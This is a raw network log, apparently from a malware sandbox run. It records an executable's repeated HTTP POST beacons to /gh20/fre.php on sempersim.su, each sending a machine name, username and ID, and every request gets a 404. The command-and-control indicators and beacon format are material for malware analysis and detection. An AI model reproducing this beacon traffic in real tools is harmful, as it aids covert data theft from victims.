    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:08.955996990 CEST | 1378 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:09.874479055 CEST | 1378 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:53 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 17 | Source IP: 192.168.2.3 | Source Port: 49781 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:11.023803949 CEST | 1379 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:11.058202028 CEST | 1379 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:11.937966108 CEST | 1380 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:55 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 18 | Source IP: 192.168.2.3 | Source Port: 49783 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:13.286094904 CEST | 1385 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:13.320576906 CEST | 1385 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:14.166476965 CEST | 1424 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:57 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 19 | Source IP: 192.168.2.3 | Source Port: 49787 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:17.520239115 CEST | 1509 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:17.555152893 CEST | 1509 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:18.447312117 CEST | 1551 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:01 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 2 | Source IP: 192.168.2.3 | Source Port: 49745 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:30.578499079 CEST | 1132 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:08:30.613064051 CEST | 1133 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:08:31.463727951 CEST | 1133 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:08:14 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 20 | Source IP: 192.168.2.3 | Source Port: 49795 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:20.096904993 CEST | 1649 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:20.131086111 CEST | 1650 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:21.018222094 CEST | 1832 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:04 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 21 | Source IP: 192.168.2.3 | Source Port: 49807 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:22.064496040 CEST | 1889 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:22.098875999 CEST | 1889 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:22.916759968 CEST | 2012 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:06 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 22 | Source IP: 192.168.2.3 | Source Port: 49832 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:27.755281925 CEST | 2469 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:27.791141033 CEST | 2494 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:28.697077990 CEST | 2550 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:12 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 23 | Source IP: 192.168.2.3 | Source Port: 49838 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:30.995615005 CEST | 2720 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:31.028866053 CEST | 2721 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:31.916398048 CEST | 2797 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:15 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 24 | Source IP: 192.168.2.3 | Source Port: 49842 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:36.768062115 CEST | 2811 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:36.802442074 CEST | 2812 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:37.680341005 CEST | 2812 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:21 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 25 | Source IP: 192.168.2.3 | Source Port: 49850 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:41.932837009 CEST | 8127 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:41.967153072 CEST | 8128 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:42.794326067 CEST | 8128 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:26 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 26 | Source IP: 192.168.2.3 | Source Port: 49856 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:47.624965906 CEST | 8173 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:47.662164927 CEST | 8174 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:48.532793999 CEST | 8174 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:32 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 27 | Source IP: 192.168.2.3 | Source Port: 49858 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:55.746968985 CEST | 8182 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:55.781109095 CEST | 8182 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:09:56.667985916 CEST | 8182 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:40 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 28 | Source IP: 192.168.2.3 | Source Port: 49865 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:09:59.728405952 CEST | 15694 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:09:59.762680054 CEST | 15695 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:10:00.690473080 CEST | 15695 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:44 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 29 | Source IP: 192.168.2.3 | Source Port: 49867 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:10:03.646769047 CEST | 15697 | OUT | POST /gh20/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: sempersim.su
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 306A36E8
    Content-Length: 163
    Connection: close
Jun 23, 2022 18:10:03.680988073 CEST | 15698 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
    Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:10:04.550873041 CEST | 15707 | IN | HTTP/1.0 404 Not Found
    date: Thu, 23 Jun 2022 16:09:48 GMT
    server: Apache/2.4.6 (CentOS) PHP/5.4.16
    x-powered-by: PHP/5.4.16
    status: 404 Not Found
    content-length: 23
    content-type: text/html; charset=UTF-8
    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
    Data Ascii: File not found.


Session ID: 3 | Source IP: 192.168.2.3 | Source Port: 49746 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:08:32.826505899 CEST | 1134 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:08:32.862839937 CEST | 1134 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:08:33.658945084 CEST | 1135 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:08:17 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 30 | Source IP: 192.168.2.3 | Source Port: 49879 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:10:05.859589100 CEST | 16770 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:10:05.894614935 CEST | 16772 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:10:06.706850052 CEST | 17112 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:09:50 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 31 | Source IP: 192.168.2.3 | Source Port: 49892 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:10:09.603862047 CEST | 17133 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:10:09.637948036 CEST | 17134 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:10:10.533294916 CEST | 17134 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:09:53 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 32 | Source IP: 192.168.2.3 | Source Port: 49895 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:10:14.615169048 CEST | 17148 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:10:14.650410891 CEST | 17148 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:10:15.552607059 CEST | 17149 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:09:58 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID: 33 | Source IP: 192.168.2.3 | Source Port: 49896 | Destination IP: 104.155.55.2 | Destination Port: 80 | Process: C:\Users\user\Desktop\hfyhigXccT.exe
Timestamp | kBytes transferred | Direction | Data
Jun 23, 2022 18:10:16.412961960 CEST | 17150 | OUT | POST /gh20/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: sempersim.su
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 306A36E8
Content-Length: 163
Connection: close
Jun 23, 2022 18:10:16.447062016 CEST | 17150 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 30 00 39 00 33 00 39 00 35 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.ruhardz093954DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Jun 23, 2022 18:10:17.418004036 CEST | 17150 | IN | HTTP/1.0 404 Not Found
date: Thu, 23 Jun 2022 16:10:00 GMT
server: Apache/2.4.6 (CentOS) PHP/5.4.16
x-powered-by: PHP/5.4.16
status: 404 Not Found
content-length: 23
content-type: text/html; charset=UTF-8
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


